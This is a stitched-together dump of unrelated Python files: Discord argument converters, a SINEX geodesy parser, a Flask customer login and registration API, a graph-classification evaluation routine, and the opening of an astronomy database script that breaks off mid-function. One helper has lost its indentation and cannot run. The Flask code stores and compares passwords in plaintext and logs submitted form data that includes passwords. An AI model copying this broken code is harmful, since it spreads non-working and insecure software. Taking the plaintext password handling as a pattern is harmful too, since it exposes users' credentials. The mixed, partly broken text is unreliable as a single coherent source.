        # REST lookup is guild-scoped, so it only applies inside a guild.
        if ctx.guild_id:
            try:
                return await ctx.rest.fetch_emoji(ctx.guild_id, emoji_id)

            except hikari.NotFoundError:
                pass

        raise ValueError("Couldn't find emoji")

    @property
    def intents(self) -> hikari.Intents:
        return hikari.Intents.GUILD_EMOJIS

    @classmethod
    def is_inheritable(cls) -> bool:
        return True

    @classmethod
    def types(cls) -> tuple[type[typing.Any], ...]:
        return (hikari.CustomEmoji,)
class GuildConverter(BaseConverter[hikari.Guild]):
    """Resolve a guild ID to a `hikari.Guild`."""

    __slots__ = ()

    @property
    def cache_bound(self) -> bool:
        return True

    async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.Guild:
        """Try the cache, then REST; raise ValueError when nothing matches."""
        guild_id = parse_snowflake(argument, message="No valid guild ID found")
        cache = ctx.client.cache
        cached = cache.get_guild(guild_id) if cache else None
        if cached:
            return cached

        try:
            return await ctx.rest.fetch_guild(guild_id)

        except hikari.NotFoundError:
            pass

        raise ValueError("Couldn't find guild")

    @property
    def intents(self) -> hikari.Intents:
        return hikari.Intents.GUILDS

    @classmethod
    def is_inheritable(cls) -> bool:
        return True

    @classmethod
    def types(cls) -> tuple[type[typing.Any], ...]:
        return (hikari.Guild,)
class InviteConverter(BaseConverter[hikari.Invite]):
    """Resolve an invite code to a cached `hikari.Invite` (cache-only lookup)."""

    __slots__ = ()

    @property
    def cache_bound(self) -> bool:
        return True

    async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.Invite:
        """Look the invite code up in the cache; no REST fallback."""
        cache = ctx.client.cache
        if isinstance(argument, str) and cache:
            found = cache.get_invite(argument)
            if found:
                return found

        raise ValueError("Couldn't find invite")

    @property
    def intents(self) -> hikari.Intents:
        return hikari.Intents.GUILD_INVITES

    @classmethod
    def is_inheritable(cls) -> bool:
        return False

    @classmethod
    def types(cls) -> tuple[type[typing.Any], ...]:
        return (hikari.Invite,)
class InviteWithMetadataConverter(BaseConverter[hikari.InviteWithMetadata]):
    """Resolve an invite code to a cached `hikari.InviteWithMetadata` (cache-only lookup)."""

    __slots__ = ()

    @property
    def cache_bound(self) -> bool:
        return True

    async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.InviteWithMetadata:
        """Look the invite code up in the cache; no REST fallback."""
        cache = ctx.client.cache
        if isinstance(argument, str) and cache:
            found = cache.get_invite(argument)
            if found:
                return found

        raise ValueError("Couldn't find invite")

    @property
    def intents(self) -> hikari.Intents:
        return hikari.Intents.GUILD_INVITES

    @classmethod
    def is_inheritable(cls) -> bool:
        return False

    @classmethod
    def types(cls) -> tuple[type[typing.Any], ...]:
        return (hikari.InviteWithMetadata,)
class MemberConverter(BaseConverter[hikari.Member]):
    """Resolve an argument to a member of the current guild."""

    __slots__ = ()

    @property
    def cache_bound(self) -> bool:
        return True

    async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.Member:
        """Resolve ``argument`` to a guild member.

        Resolution order: mention/ID parse -> cache -> REST fetch by ID; when
        the argument isn't an ID at all, fall back to a name search.

        Raises ValueError in a DM context or when nothing matches.
        """
        if ctx.guild_id is None:
            raise ValueError("Cannot get a member from a DM channel")

        try:
            member_id = parse_user_id(argument, message="No valid user mention or ID found")

        except ValueError:
            # Not an ID/mention: treat a string argument as a (nick)name query,
            # taking the first search hit.
            if isinstance(argument, str):
                try:
                    return (await ctx.rest.search_members(ctx.guild_id, argument))[0]

                except (hikari.NotFoundError, IndexError):
                    pass

        else:
            # Valid ID: prefer the cache, then fall back to REST.
            if ctx.client.cache:
                if member := ctx.client.cache.get_member(ctx.guild_id, member_id):
                    return member

            try:
                return await ctx.rest.fetch_member(ctx.guild_id, member_id)

            except hikari.NotFoundError:
                pass

        raise ValueError("Couldn't find member in this guild")

    @property
    def intents(self) -> hikari.Intents:
        return hikari.Intents.GUILD_MEMBERS

    @classmethod
    def is_inheritable(cls) -> bool:
        return False

    @classmethod
    def types(cls) -> tuple[type[typing.Any], ...]:
        return (hikari.Member,)
class PresenceConverter(BaseConverter[hikari.MemberPresence]):
    """Resolve a user mention/ID to a cached `hikari.MemberPresence` (cache-only)."""

    __slots__ = ()

    @property
    def cache_bound(self) -> bool:
        return True

    @property
    def intents(self) -> hikari.Intents:
        return hikari.Intents.GUILD_PRESENCES

    @classmethod
    def is_inheritable(cls) -> bool:
        return False

    @classmethod
    def types(cls) -> tuple[type[typing.Any], ...]:
        return (hikari.MemberPresence,)

    async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.MemberPresence:
        """Look the presence up in the cache for the current guild."""
        if ctx.guild_id is None:
            raise ValueError("Cannot get a presence from a DM channel")

        cache = ctx.client.cache
        if cache:
            target_id = parse_user_id(argument, message="No valid member mention or ID found")
            presence = cache.get_presence(ctx.guild_id, target_id)
            if presence:
                return presence

        raise ValueError("Couldn't find presence in current guild")
class RoleConverter(BaseConverter[hikari.Role]):
    """Resolve a role mention or ID to a `hikari.Role`."""

    __slots__ = ()

    @property
    def cache_bound(self) -> bool:
        return True

    async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.Role:
        """Try the cache, then scan the guild's roles over REST."""
        role_id = parse_role_id(argument, message="No valid role mention or ID found")
        cache = ctx.client.cache
        cached = cache.get_role(role_id) if cache else None
        if cached:
            return cached

        if ctx.guild_id:
            # No fetch-single-role endpoint; scan the guild's role list.
            fetched = await ctx.rest.fetch_roles(ctx.guild_id)
            found = next((role for role in fetched if role.id == role_id), None)
            if found:
                return found

        raise ValueError("Couldn't find role")

    @property
    def intents(self) -> hikari.Intents:
        return hikari.Intents.GUILDS

    @classmethod
    def is_inheritable(cls) -> bool:
        return False

    @classmethod
    def types(cls) -> tuple[type[typing.Any], ...]:
        return (hikari.Role,)
class _IDMatcher(typing.Protocol):
    """Callback protocol for the snowflake parsers built by ``make_snowflake_parser``."""

    def __call__(self, value: ArgumentT, /, *, message: str = "No valid mention or ID found") -> hikari.Snowflake:
        raise NotImplementedError
def make_snowflake_parser(regex: re.Pattern[str], /) -> _IDMatcher:
    """Build a parser which extracts a snowflake ID from a raw argument.

    Parameters
    ----------
    regex : re.Pattern[str]
        Mention pattern whose first capture group is the numeric ID.

    Returns
    -------
    _IDMatcher
        Callback which accepts a str/int/float ``value`` and returns a
        range-checked `hikari.Snowflake`, raising ValueError with ``message``
        when no valid ID can be extracted.
    """

    def parse(value: ArgumentT, /, *, message: str = "No valid mention or ID found") -> hikari.Snowflake:
        result: typing.Optional[hikari.Snowflake] = None
        if isinstance(value, str):
            if value.isdigit():
                result = hikari.Snowflake(value)

            else:
                # Take the first mention match; group 0 of the capture is the ID.
                capture = next(regex.finditer(value), None)
                result = hikari.Snowflake(capture.groups()[0]) if capture else None

        if result is None:
            try:
                # BUG FIX: this previously called operator.index(message) — indexing
                # the error string instead of the argument — so non-string numeric
                # inputs could never be parsed.
                result = hikari.Snowflake(operator.index(value))

            except (TypeError, ValueError):
                pass

        # Range-check so out-of-range integers are rejected like any other bad input.
        if result is not None and hikari.Snowflake.min() <= result <= hikari.Snowflake.max():
            return result

        raise ValueError(message) from None

    return parse
# Pre-built parsers for the common Discord mention formats; the first capture
# group of each regex is the numeric ID.
parse_snowflake = make_snowflake_parser(re.compile(r"<[@&?!#a]{0,3}(?::\w+:)?(\d+)>"))  # any mention style
parse_channel_id = make_snowflake_parser(re.compile(r"<#(\d+)>"))  # channel mention
parse_emoji_id = make_snowflake_parser(re.compile(r"<a?:\w+:(\d+)>"))  # custom (possibly animated) emoji
parse_role_id = make_snowflake_parser(re.compile(r"<@&(\d+)>"))  # role mention
parse_user_id = make_snowflake_parser(re.compile(r"<@!?(\d+)>"))  # user mention, with or without nickname "!"
class SnowflakeConverter(BaseConverter[hikari.Snowflake]):
    """Parse an argument into a raw, range-checked `hikari.Snowflake`."""

    __slots__ = ()

    @property
    def cache_bound(self) -> bool:
        # Pure parsing; never touches the cache.
        return False

    @property
    def intents(self) -> hikari.Intents:
        return hikari.Intents.NONE

    async def convert(self, _: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.Snowflake:
        """Delegate straight to the generic snowflake parser."""
        return parse_snowflake(argument, message="No valid ID found")

    @classmethod
    def is_inheritable(cls) -> bool:
        return False

    @classmethod
    def types(cls) -> tuple[type[typing.Any], ...]:
        return (hikari.Snowflake,)
class UserConverter(BaseConverter[hikari.User]):
    """Resolve a user mention or ID to a `hikari.User`."""

    __slots__ = ()

    @property
    def cache_bound(self) -> bool:
        return True

    async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.User:
        """Try the cache, then REST; raise ValueError when nothing matches."""
        user_id = parse_user_id(argument, message="No valid user mention or ID found")
        cache = ctx.client.cache
        cached = cache.get_user(user_id) if cache else None
        if cached:
            return cached

        try:
            return await ctx.rest.fetch_user(user_id)

        except hikari.NotFoundError:
            pass

        raise ValueError("Couldn't find user")

    @property
    def intents(self) -> hikari.Intents:
        return hikari.Intents.GUILD_MEMBERS

    @classmethod
    def is_inheritable(cls) -> bool:
        return False

    @classmethod
    def types(cls) -> tuple[type[typing.Any], ...]:
        return (hikari.User,)
class VoiceStateConverter(BaseConverter[hikari.VoiceState]):
    """Resolve a user mention/ID to their cached `hikari.VoiceState` (cache-only)."""

    __slots__ = ()

    @property
    def cache_bound(self) -> bool:
        return True

    async def convert(self, ctx: tanjun_abc.Context, argument: ArgumentT, /) -> hikari.VoiceState:
        """Look the user's voice state up in the cache for the current guild."""
        if ctx.guild_id is None:
            raise ValueError("Cannot get a voice state from a DM channel")

        cache = ctx.client.cache
        if cache:
            target_id = parse_user_id(argument, message="No valid user mention or ID found")
            state = cache.get_voice_state(ctx.guild_id, target_id)
            if state:
                return state

        raise ValueError("Voice state couldn't be found for current guild")

    @property
    def intents(self) -> hikari.Intents:
        return hikari.Intents.GUILD_VOICE_STATES

    @classmethod
    def is_inheritable(cls) -> bool:
        return False

    @classmethod
    def types(cls) -> tuple[type[typing.Any], ...]:
        return (hikari.VoiceState,)
def _build_url_parser(callback: collections.Callable[[str], _ValueT], /) -> collections.Callable[[str], _ValueT]:
def parse(value: str, /) -> _ValueT:
if value.startswith("<") and value.endswith(">"):
value = value[1:-1]
return callback(value)
return parse
# URL parsers which strip Discord's embed-suppressing <...> wrapping first.
defragment_url = _build_url_parser(urllib.parse.urldefrag)
parse_url = _build_url_parser(urllib.parse.urlparse)
split_url = _build_url_parser(urllib.parse.urlsplit)
# Discord timestamp markup: <t:UNIX[:style]> (a leading "-" is tolerated).
_DATETIME_REGEX = re.compile(r"<-?t:(\d+)(?::\w)?>")


def convert_datetime(value: str, /) -> datetime.datetime:
    """Parse Discord ``<t:unix[:style]>`` markup into an aware UTC datetime.

    Raises ValueError when ``value`` contains no timestamp markup.
    """
    match = _DATETIME_REGEX.search(value)
    if match is None:
        raise ValueError("Not a valid datetime") from None

    return datetime.datetime.fromtimestamp(int(match.group(1)), tz=datetime.timezone.utc)
# Maps builtin/stdlib "types" to parser callables that should be used instead of
# calling the type directly on a raw string argument.
_TYPE_OVERRIDES: dict[collections.Callable[..., typing.Any], collections.Callable[[str], typing.Any]] = {
    # NOTE(review): distutils is deprecated (PEP 632); strtobool will need a
    # local replacement on newer Pythons — confirm target versions.
    bool: distutils.util.strtobool,
    bytes: lambda d: bytes(d, "utf-8"),
    bytearray: lambda d: bytearray(d, "utf-8"),
    datetime.datetime: convert_datetime,
    hikari.Snowflake: parse_snowflake,
    urllib.parse.DefragResult: defragment_url,
    urllib.parse.ParseResult: parse_url,
    urllib.parse.SplitResult: split_url,
}
def override_type(cls: parsing.ConverterSig, /) -> parsing.ConverterSig:
    # Swap a converter callable for its registered override, defaulting to itself.
    return _TYPE_OVERRIDES.get(cls, cls)
to_channel: typing.Final[ChannelConverter] = ChannelConverter()
"""Convert user input to a `hikari.channels.PartialChannel` object."""
to_color: typing.Final[ColorConverter] = ColorConverter()
"""Convert user input to a `hikari.colors.Color` object."""
to_colour: typing.Final[ColorConverter] = to_color
"""Convert user input to a `hikari.colors.Color` object."""
to_emoji: typing.Final[EmojiConverter] = EmojiConverter()
"""Convert user input to a cached `hikari.emojis.KnownCustomEmoji` object."""
to_guild: typing.Final[GuildConverter] = GuildConverter()
"""Convert user input to a `hikari.guilds.Guild` object."""
to_invite: typing.Final[InviteConverter] = InviteConverter()
"""Convert user input to a cached `hikari.invites.InviteWithMetadata` object."""
to_invite_with_metadata: typing.Final[InviteWithMetadataConverter] = InviteWithMetadataConverter()
"""Convert user input to a `hikari.invites.Invite` object."""
to_member: typing.Final[MemberConverter] = MemberConverter()
"""Convert user input to a `hikari.guilds.Member` object."""
to_presence: typing.Final[PresenceConverter] = PresenceConverter()
"""Convert user input to a cached `hikari.presences.MemberPresence`."""
to_role: typing.Final[RoleConverter] = RoleConverter()
"""Convert user input to a `hikari.guilds.Role` object."""
to_snowflake: typing.Final[SnowflakeConverter] = SnowflakeConverter()
"""Convert user input to a `hikari.snowflakes.Snowflake`.
.. note::
This also range validates the input.
"""
to_user: typing.Final[UserConverter] = UserConverter()
"""Convert user input to a `hikari.users.User` object."""
to_voice_state: typing.Final[VoiceStateConverter] = VoiceStateConverter()
"""Convert user input to a cached `hikari.voices.VoiceState`."""
# Auto-register every module-level converter instance defined above so
# BaseConverter.get_from_type can discover them by the types they handle.
for _value in vars().copy().values():
    if isinstance(_value, BaseConverter):
        BaseConverter.implementations().add(typing.cast("BaseConverter[typing.Any]", _value))

del _value  # don't leak the loop variable as a module attribute
|
<gh_stars>10-100
"""A parser for reading data from igs.snx file based on IGS sitelog files in SINEX format
Example:
--------
from midgard import parsers
p = parsers.parse_file(parser_name='gnss_sinex_igs', file_path='igs.snx')
data = p.as_dict()
Description:
------------
Reads station information (e.g. approximated station coordinates, receiver and antenna type, station eccentricities,
...) igs.snx file in SINEX format.
"""
# Midgard imports
from midgard.dev import plugins
# Where imports
from midgard.parsers._parser_sinex import SinexParser
@plugins.register
class IgsSnxParser(SinexParser):
    """A parser for reading data from igs.snx file based on IGS sitelog files in SINEX format

    site - Site dictionary, whereby keys are the site identifiers and values are a site entry
           dictionary with the keys 'site_antenna', 'site_eccentricity', 'site_id' and 'site_receiver'. The
           site dictionary has following structure:

              self.site[site] = { 'site_antenna':      [],  # SITE/ANTENNA SINEX block information
                                  'site_eccentricity': [],  # SITE/ECCENTRICITY block information
                                  'site_id':           {},  # SITE/ID block information
                                  'site_receiver':     [] } # SITE/RECEIVER block information

           with the site entry dictionary entries

              site_antenna[ii]      = { 'point_code':       point_code,
                                        'soln':             soln,
                                        'obs_code':         obs_code,
                                        'start_time':       start_time,
                                        'end_time':         end_time,
                                        'antenna_type':     antenna_type,
                                        'radome_type':      radome_type,
                                        'serial_number':    serial_number }

              site_eccentricity[ii] = { 'point_code':       point_code,
                                        'soln':             soln,
                                        'obs_code':         obs_code,
                                        'start_time':       start_time,
                                        'end_time':         end_time,
                                        'reference_system': reference_system,
                                        'vector_1':         vector_1,
                                        'vector_2':         vector_2,
                                        'vector_3':         vector_3,
                                        'vector_type':      UNE }

              site_id               = { 'point_code':       point_code,
                                        'domes':            domes,
                                        'marker':           marker,
                                        'obs_code':         obs_code,
                                        'description':      description,
                                        'approx_lon':       approx_lon,
                                        'approx_lat':       approx_lat,
                                        'approx_height':    approx_height }

              site_receiver[ii]     = { 'point_code':       point_code,
                                        'soln':             soln,
                                        'obs_code':         obs_code,
                                        'start_time':       start_time,
                                        'end_time':         end_time,
                                        'receiver_type':    receiver_type,
                                        'serial_number':    serial_number,
                                        'firmware':         firmware }

    The counter 'ii' ranges from 0 to n and depends on how many antenna type, receiver type and
    antenna monument changes were done at each site. Note also, that time entries (e.g. start_time,
    end_time) are given in Modified Julian Date. If the time is defined as 00:000:00000 in the SINEX
    file, then the value is saved as 'None' in the Sinex class.
    """

    def setup_parser(self):
        # SINEX blocks to hand to the base-class parser, in file order. The
        # site_*/satellite_* attributes are presumably block definitions supplied
        # by SinexParser — confirm against midgard.parsers._parser_sinex.
        return (
            self.site_id,
            self.site_receiver,
            self.site_antenna,
            self.site_gps_phase_center,
            self.site_eccentricity,
            self.satellite_id,
            self.satellite_phase_center,
        )

    def parse_site_id(self, data):
        """Parse SITE/ID SINEX block

        Args:
            data: Structured array with one record per site; field names are the
                SINEX fields and include 'site_code'.
        """
        for d in data:
            site_key = d["site_code"]
            self.data.setdefault(site_key, dict())
            # NOTE(review): this setdefault is immediately overwritten by the
            # assignment below; kept as-is.
            self.data[site_key].setdefault("site_id", dict())
            self.data[site_key]["site_id"] = {n: d[n] for n in d.dtype.names}

    def parse_site_antenna(self, data):
        """Parse SITE/ANTENNA SINEX block

        Appends one entry per antenna record, splitting the combined antenna
        field into 'antenna_type' and 'radome_type'.
        """
        for d in data:
            site_key = d["site_code"]
            # TODO_hjegei: How to remove d['site_code'] from d?
            add_dict = {n: d[n] for n in d.dtype.names}  # Generate dictionary with all SINEX field entries
            add_dict["antenna_type"], add_dict["radome_type"] = d["antenna_type"].split()
            self.data.setdefault(site_key, dict())
            self.data[site_key].setdefault("site_antenna", list())
            self.data[site_key]["site_antenna"].append(add_dict)

    def parse_site_receiver(self, data):
        """Parse SITE/RECEIVER SINEX block

        Appends one entry per receiver record for each site.
        """
        for d in data:
            site_key = d["site_code"]
            # TODO_hjegei: How to remove d['site_code'] from d?
            self.data.setdefault(site_key, dict())
            self.data[site_key].setdefault("site_receiver", list())
            self.data[site_key]["site_receiver"].append({n: d[n] for n in d.dtype.names})

    def parse_site_eccentricity(self, data):
        """Parse SITE/ECCENTRICITY SINEX block

        Appends one entry per eccentricity record for each site.
        """
        for d in data:
            site_key = d["site_code"]
            # TODO_hjegei: How to remove d['site_code'] from d?
            self.data.setdefault(site_key, dict())
            self.data[site_key].setdefault("site_eccentricity", list())
            self.data[site_key]["site_eccentricity"].append({n: d[n] for n in d.dtype.names})
# TODO: Improve handling of SITE/GPS_PHASE_CENTER, SATELLITE/ID and SATELLITE/PHASE_CENTER
# SINEX block.
|
from flask import jsonify, abort, Blueprint, request, make_response
import os
import re
import sys
import uuid
import jwt
from datetime import datetime, timedelta
# Make the project root importable when this module is loaded from a subpackage.
build_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.append(build_path)

from configuration import SECRET_KEY
from src.models import Customer
from src.db_utils import Session
from src.logger import get_logger

logger = get_logger("web_app")

# All routes in this module are mounted under the "auth" blueprint.
auth_blueprint = Blueprint("auth", __name__)
@auth_blueprint.route("/customers/login", methods=["POST"])
def authenticate_customer_login():
    """
    Authenticate the customer login.

    Expects a JSON body with 'email_id' and 'password'; on success returns the
    customer info plus a JWT token, otherwise aborts with 401.
    """
    logger.debug("[authenticate_customer_login] At the Customer login place")
    form_data = request.get_json()
    logger.debug(f"[authenticate_customer_login] Posted form data is : {form_data} ")
    session = None
    result = {"customer_info": {}}
    try:
        session = Session()
        customer = session.query(Customer).filter(Customer.email_id == form_data["email_id"]).first()
        if customer:
            # NOTE(review): plaintext password comparison — passwords appear to be
            # stored unhashed; confirm the schema and switch to salted hashes.
            if customer.password == form_data["password"]:
                result["customer_info"] = customer.to_dict()
                # Token is valid for 300 minutes.
                token = jwt.encode(dict(public_id=customer.public_id,
                                        exp=datetime.utcnow() + timedelta(minutes=300)),
                                   SECRET_KEY)
                # NOTE(review): PyJWT >= 2 returns str from jwt.encode (no .decode) —
                # confirm the pinned PyJWT version.
                result["token"] = token.decode("UTF-8")
                logger.debug(f"[authenticate_customer_login] The result prepared is :: {result}")
                return result
            else:
                abort(make_response(jsonify(message="Invalid password provided."), 401))
        else:
            abort(make_response(jsonify(message="Email address not registered."), 401))
    except ValueError as ve:
        logger.exception("[authenticate_customer_login] ValueError: {}".format(ve))
    finally:
        if session:
            session.close()
    # Reached only when a ValueError was swallowed above: reply with a generic 401.
    abort(make_response(jsonify(message="Invalid details provided."), 401))
@auth_blueprint.route("/customer/login/status", methods=["GET"])
def check_customer_login_status():
    """Validate the JWT from the Authorization header and return the customer's info.

    Returns 401 when the token is missing or cannot be decoded/resolved.
    """
    token = None
    session = None
    current_customer_info = None
    # jwt is passed in the request header
    if 'Authorization' in request.headers:
        token = request.headers['Authorization']
        # Strip an optional "Bearer " scheme prefix.
        token = re.sub("^(Bearer )", "", token)
        logger.debug(f"[check_customer_login_status] token received is ::: {token}")
    # return 401 if token is not passed
    else:
        return jsonify({'message': 'Token is missing !!'}), 401

    logger.debug(f"[check_customer_login_status] Decoding the token !! {token}")
    try:
        # decoding the payload to fetch the stored details
        # NOTE(review): no algorithms= argument — PyJWT >= 2 requires it
        # (e.g. algorithms=["HS256"]); confirm the pinned PyJWT version.
        data = jwt.decode(token, SECRET_KEY)
        logger.debug(f"[check_customer_login_status] The data[public_id] decoded is ::: {data['public_id']}")
        session = Session()
        current_customer = session.query(Customer).filter_by(public_id=data['public_id']).first()
        # NOTE(review): if no customer matches, this raises AttributeError, which
        # the broad except below reports as an invalid token.
        current_customer_info = current_customer.to_dict()
    except Exception as ex:
        logger.exception(f"[token_required] Error decoding the data ::: {ex}")
        return jsonify({'message': 'Token is invalid !!'}), 401
    finally:
        if session:
            session.close()
    # returns the current logged in customers context to the routes
    return {"customer_info": current_customer_info}
@auth_blueprint.route("/customers/register", methods=["POST"])
def register_customer():
    """Create a new customer account and return their info plus a JWT token.

    Expects a JSON body with 'email_id' and 'password' (optional 'username' and
    'display_name', defaulted from the email's local part). Aborts with 401 when
    the email address is already registered.
    """
    session = None
    form_data = request.get_json()
    logger.debug(f"[register_customer ]In the creation of the Customer : {form_data}")
    try:
        session = Session()
        existing_customer = session.query(Customer).filter(Customer.email_id == form_data["email_id"]).first()
        if existing_customer:
            abort(make_response(jsonify(message='Email Address already registered, Try Login'), 401))
        # Default username/display_name to the local part of the email address.
        if not form_data.get("username"):
            form_data["username"] = form_data["email_id"].split("@")[0]
        if not form_data.get("display_name"):
            form_data["display_name"] = form_data["email_id"].split("@")[0]
        # BUG FIX: username previously passed form_data["display_name"], silently
        # discarding the username (and its default) computed above.
        # NOTE(review): password is stored as-is — hash it (e.g. werkzeug.security)
        # once the schema is confirmed.
        new_customer_info = Customer(display_name=form_data["display_name"],
                                     username=form_data["username"],
                                     email_id=form_data["email_id"],
                                     password=form_data["password"])
        new_customer_info.public_id = str(uuid.uuid4())
        if not new_customer_info.display_name:
            new_customer_info.display_name = new_customer_info.email_id.split("@")[0]
        session.add(new_customer_info)
        logger.debug(f"[register_customer] Customer added to database response is :: {new_customer_info}")
        session.commit()
        result = {"customer_info": new_customer_info.to_dict()}
        logger.debug(f"[register_customer] The result prepared is :: {result}")
        # Token is valid for 300 minutes.
        token = jwt.encode(dict(public_id=new_customer_info.public_id, exp=datetime.utcnow() + timedelta(minutes=300)),
                           SECRET_KEY)
        # NOTE(review): PyJWT >= 2 returns str from jwt.encode (no .decode) —
        # confirm the pinned PyJWT version.
        result["token"] = token.decode("UTF-8")
        return result
    except ValueError as ex:
        logger.exception(f"[register_customer] Exception: {ex}")
    finally:
        if session:
            session.close()
|
<gh_stars>1-10
from __future__ import division
from sklearn.preprocessing import label_binarize
#LINK-Logistic Regression [Zheleva, Getoor, 2009] uses labelled nodes to fit a regularized logistic regression model
#(Supplementary Note 2.2) that interprets rows of the adjacency matrix as sparse binary feature vectors,
#performing classification based on these features. The trained model is then applied to the feature vectors
#(adjacency matrix rows) of unlabelled nodes, which are scored based on the probability
# estimates from themodel.
def LINK(num_unlabeled, membership_y, feature_x, clf, num_iter, cv_setup=None):
    """Run the LINK baseline [Zheleva & Getoor, 2009] over a sweep of test-set sizes.

    Fits ``clf`` on adjacency-matrix rows (sparse binary features) of labelled
    nodes and scores held-out nodes, repeating ``num_iter`` shuffle splits per
    entry of ``num_unlabeled``.

    Args:
        num_unlabeled: Sequence of test-set sizes/fractions to sweep.
        membership_y: Node label array.
        feature_x: Feature matrix (rows of the adjacency matrix).
        clf: Classifier with fit/predict/predict_proba (sklearn API).
        num_iter: Number of shuffle-split iterations per test size.
        cv_setup: 'stratified' for StratifiedShuffleSplit, anything else uses
            ShuffleSplit.

    Returns:
        Tuple of lists aligned with num_unlabeled:
        (mean_accuracy, se_accuracy, mean_micro_auc, se_micro_auc,
         mean_wt_auc, se_wt_auc). "accuracy" is actually a macro F1 of a
        thresholded positive-class probability; "se" values are np.std.
    """
    # BUG FIX: these names were unbound at module level (NameError at call
    # time). Kept as local imports so the fix is self-contained; note that
    # sklearn.cross_validation is the pre-0.20 API this code targets.
    import numpy as np
    from sklearn import cross_validation, metrics
    from sklearn.metrics import f1_score, confusion_matrix

    class_labels = np.sort(np.unique(np.array(membership_y)))  # unique label IDs
    mean_accuracy = []
    se_accuracy = []
    mean_micro_auc = []
    se_micro_auc = []
    mean_wt_auc = []
    se_wt_auc = []
    for i in range(len(num_unlabeled)):
        print(num_unlabeled[i])
        if cv_setup == 'stratified':
            k_fold = cross_validation.StratifiedShuffleSplit((membership_y), n_iter=num_iter,
                                                             test_size=num_unlabeled[i],
                                                             random_state=0)
        else:
            k_fold = cross_validation.ShuffleSplit(len(membership_y), n_iter=num_iter,
                                                   test_size=num_unlabeled[i],
                                                   random_state=0)
        accuracy = []
        micro_auc = []
        wt_auc = []
        for k, (train, test) in enumerate(k_fold):
            clf.fit(feature_x[train], np.ravel(membership_y[train]))
            pred = clf.predict(feature_x[test])
            prob = clf.predict_proba(feature_x[test])
            labeled_data = np.copy(np.array(membership_y))
            ground_truth_testing = np.array(labeled_data)[test]
            # Mask test labels with a value outside the training label range so
            # they cannot leak into the benchmark below.
            labeled_data[test] = np.max(class_labels) + 1
            # Fraction of training nodes carrying the max class label; used as a
            # probability threshold for the "accuracy" (macro-F1) score.
            accuracy_score_benchmark = np.mean(np.array(labeled_data)[train] == np.max(class_labels))
            # AUC scores: multi-class uses the full probability matrix, binary
            # uses the positive-class column.
            if len(np.unique(membership_y)) > 2:
                micro_auc.append(metrics.roc_auc_score(label_binarize(membership_y[test], np.unique(membership_y)),
                                                       prob, average='micro'))
                wt_auc.append(metrics.roc_auc_score(label_binarize(membership_y[test], np.unique(membership_y)), prob,
                                                    average='weighted'))
            else:
                micro_auc.append(metrics.roc_auc_score(label_binarize(membership_y[test], np.unique(membership_y)),
                                                       prob[:, 1], average='micro'))
                wt_auc.append(metrics.roc_auc_score(label_binarize(membership_y[test], np.unique(membership_y)),
                                                    prob[:, 1], average='weighted'))
                y_true = label_binarize(membership_y[test], np.unique(membership_y))
                y_pred = np.array(((prob[:, 1]) > accuracy_score_benchmark) + 0)
                accuracy.append(f1_score(y_true, y_pred, average='macro'))
                tn, fp, fn, tp = confusion_matrix(label_binarize(membership_y[test], np.unique(membership_y)),
                                                  ((prob[:, 1]) > accuracy_score_benchmark) + 0).ravel()
        mean_accuracy.append(np.mean(accuracy))
        # NOTE(review): np.std is the standard deviation, not the standard error,
        # despite the "se_" naming.
        se_accuracy.append(np.std(accuracy))
        mean_micro_auc.append(np.mean(micro_auc))
        se_micro_auc.append(np.std(micro_auc))
        mean_wt_auc.append(np.mean(wt_auc))
        se_wt_auc.append(np.std(wt_auc))
    return (mean_accuracy, se_accuracy, mean_micro_auc, se_micro_auc, mean_wt_auc, se_wt_auc)
|
<filename>bigmacs_naive/adam_save_slr.py
#!/usr/bin/env python
#########################
#
# Save slr offsets to the photometry database
#
##########################
import unittest, sys, os, optparse, re
import pyfits, numpy as np
sys.path.append('/u/ki/awright/bonnpipeline/')
import photometry_db, ldac, adam_utilities
##########################
__cvs_id__ = "$Id: save_slr.py,v 1.2 2010-09-01 01:38:56 dapple Exp $"
##########################
##################################################
### Photometry Global Database
##################################################
class Phot_db(object):
    '''Lazy proxy for the photometry database of choice.

    The wrapped database class is not constructed until the first
    attribute access, at which point one instance is built and cached
    for all later lookups.
    '''
    def __init__(self, db, *args, **keywords):
        self.db = db              # class/factory for the real database
        self.instance = None      # created lazily on first attribute access
        self.args = args
        self.keywords = keywords
    def __getattr__(self, name):
        # __getattr__ only fires for names missing from the proxy itself,
        # so the attributes set in __init__ never recurse into here.
        instance = self.instance
        if instance is None:
            instance = self.db(*self.args, **self.keywords)
            self.instance = instance
        return getattr(instance, name)
# Module-level default: a lazy proxy so the real Photometry_db is only
# constructed when first used (e.g. not during unit tests).
__default_photometry_db__ = Phot_db(photometry_db.Photometry_db)
####################################################
def main(argv = sys.argv):
    """Command-line entry point: parse options and save a cluster's SLR
    zeropoint offsets to the photometry database via saveSlrZP()."""
    ###
    def parse_spec(option, opt, value, parser):
        # optparse callback for --spec: each key=val pair is accumulated
        # into options.specification (the uniqueness key of a calibration).
        key, val = value.split('=')
        if not hasattr(parser.values, 'specification'):
            setattr(parser.values, 'specification', {})
        parser.values.specification[key] = val
    ###
    parser = optparse.OptionParser()
    parser.add_option('-c', '--cluster',
                      dest = 'cluster',
                      help = 'Cluster name',
                      default = None)
    parser.add_option('-o', '--offsets',
                      dest = 'offsetfile',
                      help = 'Name of offset file',
                      metavar = 'FILE',
                      default = None)
    parser.add_option('-i', '--input',
                      dest = 'inputfile',
                      help = 'Name of catalog which was calibrated',
                      metavar = 'FILE',
                      default = None)
    # NOTE(review): default = {} is a shared mutable default; harmless for a
    # single parse but worth confirming if main() is ever called repeatedly.
    parser.add_option('-s', '--spec', dest='specification',
                      action='callback',
                      type= 'string',
                      help='key=val set determines the uniqueness of this calibration',
                      default = {},
                      metavar = 'key=val',
                      callback = parse_spec)
    parser.add_option('--fluxtype',
                      dest = 'fluxtype',
                      help = 'Flux Type to pull from ZPS table',
                      default = 'APER')
    options, args = parser.parse_args(argv)
    # Cluster name, offset file and calibrated catalog are all mandatory.
    if options.cluster is None:
        parser.error('Please specify cluster name')
